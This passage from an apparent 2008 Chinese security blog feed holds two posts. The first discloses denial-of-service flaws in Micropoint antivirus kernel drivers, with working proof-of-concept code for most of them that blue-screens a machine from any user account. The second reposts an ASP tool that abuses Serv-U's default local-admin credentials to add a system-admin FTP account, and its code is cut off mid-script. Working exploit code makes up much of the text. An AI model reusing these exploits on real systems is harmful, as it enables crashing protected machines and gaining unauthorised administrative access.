0x4859C30E)&lt;br/&gt;&lt;br/&gt;偏移0XBAE处实际是其对ZwOpenEvent的HOOK实际处理部分（首先经过一个HOOK引擎mp110003.sys转发）。&lt;br/&gt;&lt;br/&gt;ZwOpenEvent的原型是：&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;div class=&quot;code&quot;&gt;NTSTATUS &lt;br/&gt;&amp;nbsp;&amp;nbsp;ZwOpenEvent(&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;OUT PHANDLE&amp;nbsp;&amp;nbsp;EventHandle,&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;IN ACCESS_MASK&amp;nbsp;&amp;nbsp;DesiredAccess,&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;IN POBJECT_ATTRIBUTES&amp;nbsp;&amp;nbsp;ObjectAttributes&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;);&lt;/div&gt;&lt;br/&gt;&lt;br/&gt;微点只对ObjectAttributes做了ProbeForRead检查，没有对该结构内部成员的缓存地址做有效检查，就直接使用系统函数RtlUnicodeStringToAnsiString将该结构的ObjectAttributes-&gt;ObjectName转换为ANSI字符，因此只要RING3的程序对该域填充错误地址，就可以引发系统访问无效内存蓝屏&lt;br/&gt;&lt;br/&gt;由于该函数的Hook函数中使用了结构化异常处理，因此传0之类的地址是无法引发蓝屏的，但只要传入任何一个无效的内核地址（例如0x80000000)，就可以使微点蓝屏&lt;br/&gt;&lt;br/&gt;下面是引发蓝屏的测试代码：&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;div class=&quot;code&quot;&gt;HMODULE hlib = LoadLibrary(&amp;quot;ntdll.dll&amp;quot;);&lt;br/&gt;PVOID p = GetProcAddress(hlib , &amp;quot;ZwOpenEvent&amp;quot;);&lt;br/&gt;&lt;br/&gt;OBJECT_ATTRIBUTES oba ;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;oba.ObjectName = (PUNICODE_STRING)0x80000000 ;&lt;br/&gt;&lt;br/&gt;__asm&amp;#123;&lt;br/&gt;&amp;nbsp;&amp;nbsp; lea eax ,oba &lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;push eax&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;call p&lt;br/&gt;&amp;#125;&lt;/div&gt;&lt;br/&gt;&lt;br/&gt;运行了这段代码后，系统即蓝屏重启，适用于任何安装了微点的系统任何用户权限。&lt;br/&gt;&lt;br/&gt;我编写了一个测试程序&quot;BSOD_MP.exe&quot;,在装有20080924及以下版本的微点的系统，运行程序后点&quot;done&quot;,系统即会蓝屏。&lt;br/&gt;&lt;br/&gt;测试程序下载:&lt;a href=&quot;http://mj0011.ys168.com&quot; target=&quot;_blank&quot;&gt;http://mj0011.ys168.com&lt;/a&gt; 漏洞演示目录下BSOD_mp.rar&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;strong&gt;(2).驱动对ZwOpenThread的HOOK处理存在漏洞，可能导致系统其他组件工作不正常&lt;/strong&gt;&lt;br/&gt;&lt;br/&gt;在同样版本的mp110013.sys中，对于ZwOpenThread的处理存在BUG，可能导致任意调用该函数的其他驱动程序或系统组件失败！&lt;br/&gt;&lt;br/&gt;在对ZwOpenThread的HOOK中，微点的驱动没有判断系统上个模式，而是直接使用ProbeForRead函数去校验ZwOpenThread的参数： ObjectAttributes，这样做的结果会导致在驱动中使用该函数的驱动，只要使用了这个参数，调用这个函数就会返回失败。STATUS_ACCESS_DEIND&lt;br/&gt;&lt;br/&gt;正确的做法应该是先判断当前线程的前个模式，如果是UserMode,再做有效性校验。&lt;br/&gt;&lt;br/&gt;这个函数在驱动中用得不多，但也不是没有，属于微软有文档的函数，例如在Sandboxie的驱动中就有用到这个，如果这个函数失败，沙箱内的进程在执行某些操作的时候，就可能出错，甚至导致系统崩溃。&lt;br/&gt;&lt;br/&gt;====================================================&lt;br/&gt;&lt;br/&gt;综上来看，微点的驱动开发者对如何校验用户态参数还是有一些概念的，可惜的是，不仅理解不深，而且还会出现一些粗心大意的毛病~象SSDT HOOK这样直面用户态程序的驱动代码，还是要慎之慎之~~&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;另外这也暴露出，微点的测试流程不够专业，驱动测试不够重视，如果发布前使用BSODHook等Driver Test工具跑一跑，就不会出现如（1）中那样弱智的错误了~&lt;br/&gt;&lt;br/&gt;&lt;strong&gt;(3). 对ZwDeleteValueKey 的HOOK函数对用户态参数没有做检查，导致任何权限用户在安装了微点的系统上可引发蓝屏&lt;/strong&gt;&lt;br/&gt;&lt;br/&gt;处理函数位于mp110009.sys, 版本:1.2.10045 ,CheckSum = 0xCC78 , TimeStamp = 0x48478FCF&lt;br/&gt;&lt;br/&gt;偏移0x12f7处是对ZwDeleteValueKey的HOOK处理函数，该函数的原型是：&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;div class=&quot;code&quot;&gt;NTSTATUS&lt;br/&gt;NtDeleteValueKey(&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;__in HANDLE KeyHandle,&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;__in PUNICODE_STRING ValueName&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;)&lt;/div&gt;&lt;br/&gt;&lt;br/&gt;微点完全没有检查第二个参数 ValueName的有效性就在其代码偏移0x824处直接取该地址的数据，于是只要传给该参数 错误的地址，系统就会立即蓝屏&lt;br/&gt;&lt;br/&gt;如下：微点的处理代码：&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;div class=&quot;code&quot;&gt;F8D39815:&lt;br/&gt;mov&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; eax, &amp;#91;ebp+SourceString&amp;#93;&lt;br/&gt;test&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;eax, eax&lt;br/&gt;jz&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; F8D398C0&lt;br/&gt;and&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;#91;ebp+ms_exc.disabled&amp;#93;, 0&lt;br/&gt;cmp&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; word ptr &amp;#91;eax&amp;#93;, 0 &amp;lt;---memory fault , check by kfuzz&lt;br/&gt;jz&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;short F8D39833&lt;/div&gt;&lt;br/&gt;&lt;br/&gt;直接取到参数后判断了下是不是0就直接从内存取出UNICODE_STRING的Length域了&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;运行以下代码后，该版本微点同样立即蓝屏，这里就不给测试程序了~有兴趣的自己编译了看看&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;div class=&quot;code&quot;&gt;HMODULE hlib = LoadLibrary(&amp;quot;ntdll.dll&amp;quot;);&lt;br/&gt;PVOID p = GetProcAddress(hlib , &amp;quot;ZwDeleteValueKey&amp;quot;);&lt;br/&gt;__asm&amp;#123;&lt;br/&gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp; push 0x80000000&lt;br/&gt;&amp;nbsp;&amp;nbsp; push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp; call p&lt;br/&gt;&lt;br/&gt;&amp;#125;&lt;/div&gt;&lt;br/&gt;&lt;br/&gt;&lt;strong&gt;(4).在对IoCreateFile-&gt;Call ObOpenObjectByName的inline hook中，完全未作参数检查，导致任何权限用户在安装了微点的系统上可引发蓝屏&lt;/strong&gt;&lt;br/&gt;&lt;br/&gt;微点Hook了IoCreateFile -&gt; IopCreateFile -&gt; call ObOpenObjectByName，使用替换4字节地址指针的方式。&lt;br/&gt;&lt;br/&gt;此时可爱的微点小朋友以为传递给ObOpenObjectByName的参数都已经是已经过内核校验过的了，因此自己不做任何检查，直接使用，甚至连结构化异常处理都不使用.&lt;br/&gt;&lt;br/&gt;实际上对IoCreateFile的参数检查到ObOpenOpenByName中才刚刚开始~&lt;br/&gt;&lt;br/&gt;结果就导致随便传入错误的参数给ZwCreateFile，就可以引发微点的蓝屏&lt;br/&gt;&lt;br/&gt;出问题的模块是mp110011.sys,版本：1.2.10237 ， checksum = 0x0002291a TimeStamp = 0x488944d9&lt;br/&gt;&lt;br/&gt;在偏移0x45ca处即使替换ObOpenObjectByName的Hook函数。可以看到微点检查到其DesiredAccess 参数中包含了DELETE权限，就直接从第一个参数ObjectAttributes中取数据，完全不做任何检查。&lt;br/&gt;&lt;br/&gt;利用代码，此代码运行后安装有微点的系统将立即蓝屏：&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;div class=&quot;code&quot;&gt;HMODULE hlib = LoadLibrary(&amp;quot;ntdll.dll&amp;quot;);&lt;br/&gt;PVOID p = GetProcAddress(hlib , &amp;quot;ZwCreateFile&amp;quot;);&lt;br/&gt;&lt;br/&gt;HANDLE filehandle ; &lt;br/&gt;IO_STATUS_BLOCK iosb ;&lt;br/&gt;&lt;br/&gt;__asm&amp;#123;&lt;br/&gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp; PUSH 0 &lt;br/&gt;&amp;nbsp;&amp;nbsp; PUSH 0 &lt;br/&gt;&amp;nbsp;&amp;nbsp; push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp; push 1&lt;br/&gt;&amp;nbsp;&amp;nbsp; push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp; push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp; push 0 &lt;br/&gt;&amp;nbsp;&amp;nbsp; lea eax , iosb&lt;br/&gt;&amp;nbsp;&amp;nbsp; push eax&lt;br/&gt;&amp;nbsp;&amp;nbsp; push 0&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;//ObjectAttributes set to Zero&lt;br/&gt;&amp;nbsp;&amp;nbsp; push 0x10080 // bypass DELETE access check&lt;br/&gt;&amp;nbsp;&amp;nbsp; lea eax ,filehandle &lt;br/&gt;&amp;nbsp;&amp;nbsp; push eax&lt;br/&gt;&amp;nbsp;&amp;nbsp; call p&lt;br/&gt;&lt;br/&gt;&amp;#125;&lt;/div&gt;&lt;br/&gt;&lt;br/&gt;&lt;strong&gt;5).微点对NtWriteFile-&gt; Call ObReferenceObjectByHandle的HOOK中未对参数做有效性检查，可导致任意权限用户在安装了微点的系统上可引发系统蓝屏&lt;/strong&gt;&lt;br/&gt;&lt;br/&gt;存在漏洞的文件:mp110011.sys,版本:1.2.10237,CheckSum = 0x0002291a , TimeStamp = 0x488944d9&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;微点hook了NtWriteFile-&gt; Call ObReferenceObjectByHandle并对其中的FileHandle进行检查，检查对应的设备对象-&gt;驱动对象是否是Disk，如果是的话，判断写入的偏移，进行阻截或放行&lt;br/&gt;&lt;br/&gt;其中hook函数使用读取外层函数（NtWriteFile)保存的栈指针(ebp)来读取外层函数的参数pByteOffset,但未对该参数做有效性检查，就直接使用，导致了攻击的可能&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;使用以下代码即可在任意用户权限在使安装了微点的系统蓝屏：&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;div class=&quot;code&quot;&gt;HMODULE hlib = LoadLibrary(&amp;quot;ntdll.dll&amp;quot;);&lt;br/&gt;PVOID p = GetProcAddress(hlib , &amp;quot;ZwWriteFile&amp;quot;);&lt;br/&gt;&lt;br/&gt;HANDLE hfile = CreateFile(&amp;quot;&amp;#92;&amp;#92;&amp;#92;&amp;#92;.&amp;#92;&amp;#92;PhysicalDrive0&amp;quot; , FILE_WRITE_DATA , 0 , 0 , OPEN_EXISTING , 0 , 0 );&lt;br/&gt;if (hfile != INVALID_HANDLE_VALUE)&lt;br/&gt;&amp;#123;&lt;br/&gt;&amp;nbsp;&amp;nbsp; __asm&lt;br/&gt;&amp;nbsp;&amp;nbsp; &amp;#123;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;1 //-&amp;gt;pByteOffset，cannot be zero&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;push&amp;nbsp;&amp;nbsp; 0&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;push hfile&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;call p &lt;br/&gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp; &amp;#125;&lt;br/&gt;&amp;#125;&lt;/div&gt;&lt;br/&gt;&lt;br/&gt;&lt;strong&gt;(6).微点在对NtOpenProcess的头部inline hook中，未进行任何参数检查就直接使用参数，导致任意权限用户可引发安装了微点的系统蓝屏&lt;/strong&gt;&lt;br/&gt;&lt;br/&gt;mp110013.sys(版本1.2.10126.0, CheckSum = 0x0000FDB7 , TimeStamp = 0x4859C30E)&lt;br/&gt;&lt;br/&gt;在其处理函数中未做任何参数检查，直接使用了参数pClientId 的缓存地址，也没有结构化异常处理，因此直接传递0地址即可使系统蓝屏&lt;br/&gt;&lt;br/&gt;测试代码：&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;div class=&quot;code&quot;&gt;HMODULE hlib = LoadLibrary(&amp;quot;ntdll.dll&amp;quot;);&lt;br/&gt;PVOID p = GetProcAddress(hlib , &amp;quot;NtOpenProcess&amp;quot;);&lt;br/&gt;&lt;br/&gt;__asm&amp;#123;&lt;br/&gt;&amp;nbsp;&amp;nbsp; push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp; push 0 &lt;br/&gt;&amp;nbsp;&amp;nbsp; push 1&amp;nbsp;&amp;nbsp; //access must have &amp;quot;PROCESS_TERMINATE&amp;quot;&lt;br/&gt;&amp;nbsp;&amp;nbsp; push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp; call p&lt;br/&gt;&lt;br/&gt;&amp;#125;&lt;/div&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;strong&gt;(7).微点对于NtCreateThread的HOOK处理中存在拒绝服务漏洞，可导致任何权限用户在安装了微点的系统上引发蓝屏&lt;/strong&gt;&lt;br/&gt;&lt;br/&gt;mp110013.sys(版本1.2.10126.0, CheckSum = 0x0000FDB7 , TimeStamp = 0x4859C30E)&lt;br/&gt;&lt;br/&gt;在其函数中未对参数pContext做任何检查，就使用该参数，并且没有使用任何结构化异常处理，因此只要传0就可以导致蓝屏&lt;br/&gt;&lt;br/&gt;测试代码：&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;div class=&quot;code&quot;&gt;HMODULE hlib = LoadLibrary(&amp;quot;ntdll.dll&amp;quot;);&lt;br/&gt;PVOID p = GetProcAddress(hlib , &amp;quot;NtCreateThread&amp;quot;);&lt;br/&gt;&lt;br/&gt;__asm&amp;#123;&lt;br/&gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp; push 1 //need createsuspend:)&lt;br/&gt;&amp;nbsp;&amp;nbsp; push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp; push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp; push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp; push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp; push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp; push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp; push 0&lt;br/&gt;&amp;nbsp;&amp;nbsp; call p&lt;br/&gt;&lt;br/&gt;&amp;#125;&lt;/div&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;Tags - &lt;a href=&quot;http://tlk.net.ru/tags/%25E5%25BE%25AE%25E7%2582%25B9%25E4%25B8%25BB%25E5%258A%25A8%25E9%2598%25B2%25E5%25BE%25A1/&quot; rel=&quot;tag&quot;&gt;微点主动防御&lt;/a&gt; , &lt;a href=&quot;http://tlk.net.ru/tags/%25E6%258B%2592%25E7%25BB%259D%25E6%259C%258D%25E5%258A%25A1%25E6%25BC%258F%25E6%25B4%259E/&quot; rel=&quot;tag&quot;&gt;拒绝服务漏洞&lt;/a&gt; , &lt;a href=&quot;http://tlk.net.ru/tags/%25E5%2586%2585%25E6%25A0%25B8%25E6%25BC%258F%25E6%25B4%259E/&quot; rel=&quot;tag&quot;&gt;内核漏洞&lt;/a&gt;&lt;br /&gt;&lt;!-- Feedsky flare --&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=c3233ed79b3bb6532c7c2aec96abf013&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=c3233ed79b3bb6532c7c2aec96abf013&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=c60b2dd740489148fb196c6c54ca9c9d&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=c60b2dd740489148fb196c6c54ca9c9d&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=5a8ea2a8b4773161b0a8fd7c2ea6449b&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=5a8ea2a8b4773161b0a8fd7c2ea6449b&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=2fd411e69a9b8470ea1e0026b266689f&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=2fd411e69a9b8470ea1e0026b266689f&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=1607ebf7ffc0752846426248f7fe51db&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=1607ebf7ffc0752846426248f7fe51db&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=94a70bc539264f837638c5d5a76f05e9&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=94a70bc539264f837638c5d5a76f05e9&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://feed.feedsky.com/~flare/tlk8?a=8f7c89b82e335daef973ddf3c3b5d444&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://feed.feedsky.com/~flare/tlk8?i=8f7c89b82e335daef973ddf3c3b5d444&quot; border=&quot;0&quot;&gt;&lt;/a&gt;&lt;!-- /Feedsky flare --&gt;</description><category>Bug&amp;amp;EXP</category><pubDate>Thu, 02 Oct 2008 10:33:28 +0800</pubDate><author>kok &lt;k@tlk8.cn&gt;</author><guid isPermaLink="false">http://tlk.net.ru/micropoint-bug/</guid><dc:creator>kok &lt;k@tlk8.cn&gt;</dc:creator><fs:srclink>http://tlk.net.ru/micropoint-bug/</fs:srclink><fs:srcfeed>http://tlk.net.ru/feed.php</fs:srcfeed><fs:itemid>feedsky/tlk8/~7114500/120473232/5165305</fs:itemid></item><item><title>su提权漏洞 涉及su7及su7以下版本</title><link>http://item.feedsky.com/~feedsky/tlk8/~7114500/120473233/5165305/1/item.html</link><description>信息来源：安全叶子技术小组[J.Leaves Security Team]（&lt;a href=&quot;http://00day.cn&quot; target=&quot;_blank&quot;&gt;http://00day.cn&lt;/a&gt;）&lt;br/&gt;&lt;br/&gt;一直通杀到su7~~ 可以用来加ftp帐号的......&lt;br/&gt;&lt;br/&gt;测试代码(仅供安全研究)&lt;br/&gt;&lt;div class=&quot;code&quot;&gt;&amp;lt;title&amp;gt;Serv-U TOOL&amp;lt;/title&amp;gt;&lt;br/&gt;&amp;lt;style type=&amp;quot;text/css&amp;quot;&amp;gt;&lt;br/&gt;body &amp;#123; &lt;br/&gt;background-color: #333333;&lt;br/&gt;&amp;#125;&lt;br/&gt;a:hover &amp;#123;text-decoration: none;color: #FF0000;&amp;#125;&lt;br/&gt;a:active &amp;#123;text-decoration: none;color: #FF0000;&amp;#125;&lt;br/&gt;.buttom &amp;#123;&lt;br/&gt;&amp;nbsp;&amp;nbsp;color: #333333;&lt;br/&gt;&amp;nbsp;&amp;nbsp;border: 1px solid #000000&lt;br/&gt;#;&lt;br/&gt;&amp;#125;&lt;br/&gt;.TextBox &amp;#123;border: 1px solid #084B8E&amp;#125;&lt;br/&gt;body,td,th &amp;#123;&lt;br/&gt;&amp;nbsp;&amp;nbsp;color: #CCCCCC;&lt;br/&gt;&amp;#125;&lt;br/&gt;&amp;lt;/style&amp;gt;&lt;br/&gt; &amp;lt;p align=&amp;quot;center&amp;quot;&amp;gt;Serv-U Local Add User with ASP&amp;lt;/p&amp;gt;&lt;br/&gt; &amp;lt;p align=&amp;quot;center&amp;quot;&amp;gt;Author: Xiao.K&amp;lt;/p&amp;gt;&lt;br/&gt; &amp;lt;form name=&amp;quot;form1&amp;quot; method=&amp;quot;post&amp;quot; action=&amp;quot;&amp;quot;&amp;gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;lt;p align=&amp;quot;center&amp;quot;&amp;gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp; ------------------Serv-U Information------------------&lt;br/&gt;&amp;nbsp;&amp;nbsp; &amp;lt;br&amp;gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;user:&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;input name=&amp;quot;duser&amp;quot; type=&amp;quot;text&amp;quot; class=&amp;quot;TextBox&amp;quot; id=&amp;quot;duser&amp;quot; value=&amp;quot;LocalAdministrator&amp;quot;&amp;gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;br&amp;gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;pwd :&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;input name=&amp;quot;dpwd&amp;quot; type=&amp;quot;text&amp;quot; class=&amp;quot;TextBox&amp;quot; id=&amp;quot;dpwd&amp;quot; value=&amp;quot;#l@$ak#.lk;0@P&amp;quot;&amp;gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;br&amp;gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;port:&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;lt;input name=&amp;quot;dport&amp;quot; type=&amp;quot;text&amp;quot; class=&amp;quot;TextBox&amp;quot; id=&amp;quot;dport&amp;quot; value=&amp;quot;43958&amp;quot;&amp;gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;lt;br&amp;gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;---------------------Add User!!! ---------------------&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;lt;BR&amp;gt;&lt;br/&gt; Domain: &amp;amp;nbsp; &lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;lt;input name=&amp;quot;domain&amp;quot; type=&amp;quot;text&amp;quot; class=&amp;quot;TextBox&amp;quot; id=&amp;quot;domain&amp;quot; value=&amp;quot;secdst&amp;quot; /&amp;gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;lt;br&amp;gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;FTP USER:&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;lt;input name=&amp;quot;fuser&amp;quot; type=&amp;quot;text&amp;quot; class=&amp;quot;TextBox&amp;quot; id=&amp;quot;fuser&amp;quot; value=&amp;quot;xiaok&amp;quot;&amp;gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;lt;br&amp;gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;FTP PASS:&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;lt;input name=&amp;quot;fpass&amp;quot; type=&amp;quot;text&amp;quot; class=&amp;quot;TextBox&amp;quot; id=&amp;quot;fpass&amp;quot; value=&amp;quot;bbs.secdst.net&amp;quot;&amp;gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;lt;br&amp;gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;FTP PORT:&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;lt;input name=&amp;quot;fport&amp;quot; type=&amp;quot;text&amp;quot; class=&amp;quot;TextBox&amp;quot; id=&amp;quot;fport&amp;quot; value=&amp;quot;21&amp;quot;&amp;gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;lt;br&amp;gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;FTP PATH:&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;lt;input name=&amp;quot;fpath&amp;quot; type=&amp;quot;text&amp;quot; class=&amp;quot;TextBox&amp;quot; id=&amp;quot;fpath&amp;quot; value=&amp;quot;c:&amp;#92;&amp;#92;&amp;quot;&amp;gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;lt;br&amp;gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;Privilege&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;lt;select para=value name=&amp;quot;privilege&amp;quot;&amp;gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;lt;option value=2&amp;gt;Read-only Admin&amp;lt;/option&amp;gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;option value=3&amp;gt;Group Admin&amp;lt;/option&amp;gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;option value=4&amp;gt;Domain Admin&amp;lt;/option&amp;gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;option value=5&amp;gt;System Admin&amp;lt;/option&amp;gt;&lt;br/&gt;&amp;lt;/select&amp;gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;lt;/p&amp;gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;lt;p align=&amp;quot;center&amp;quot;&amp;gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;input name=&amp;quot;radiobutton&amp;quot; type=&amp;quot;radio&amp;quot; value=&amp;quot;add&amp;quot; checked class=&amp;quot;TextBox&amp;quot;&amp;gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Add User &lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;input type=&amp;quot;radio&amp;quot; name=&amp;quot;radiobutton&amp;quot; value=&amp;quot;del&amp;quot; class=&amp;quot;TextBox&amp;quot;&amp;gt; &lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Del User &amp;lt;/p&amp;gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;lt;p align=&amp;quot;center&amp;quot;&amp;gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;input name=&amp;quot;Submit&amp;quot; type=&amp;quot;submit&amp;quot; class=&amp;quot;buttom&amp;quot; value=&amp;quot;Run&amp;quot; /&amp;gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp;&amp;lt;/p&amp;gt;&lt;br/&gt;&amp;lt;/form&amp;gt;&lt;br/&gt;&amp;nbsp;&amp;nbsp; &amp;lt;%&lt;br/&gt;user = request.Form(&amp;quot;duser&amp;quot;)&lt;br/&gt;pass = request.Form(&amp;quot;dpwd&amp;quot;)&lt;br/&gt;port = request.Form(&amp;quot;dport&amp;quot;)&lt;br/&gt;domain = request.Form(&amp;quot;domain&amp;quot;)&lt;br/&gt;fuser = request.Form(&amp;quot;fuser&amp;quot;)&lt;br/&gt;fpass = request.Form(&amp;quot;fpass&amp;quot;)&lt;br/&gt;fport = request.Form(&amp;quot;fport&amp;quot;)&lt;br/&gt;fpath = request.Form(&amp;quot;fpath&amp;quot;)&lt;br/&gt;privilege=request.Form(&amp;quot;privilege&amp;quot;)&lt;br/&gt;select case privilege&lt;br/&gt;&amp;nbsp;&amp;nbsp; case 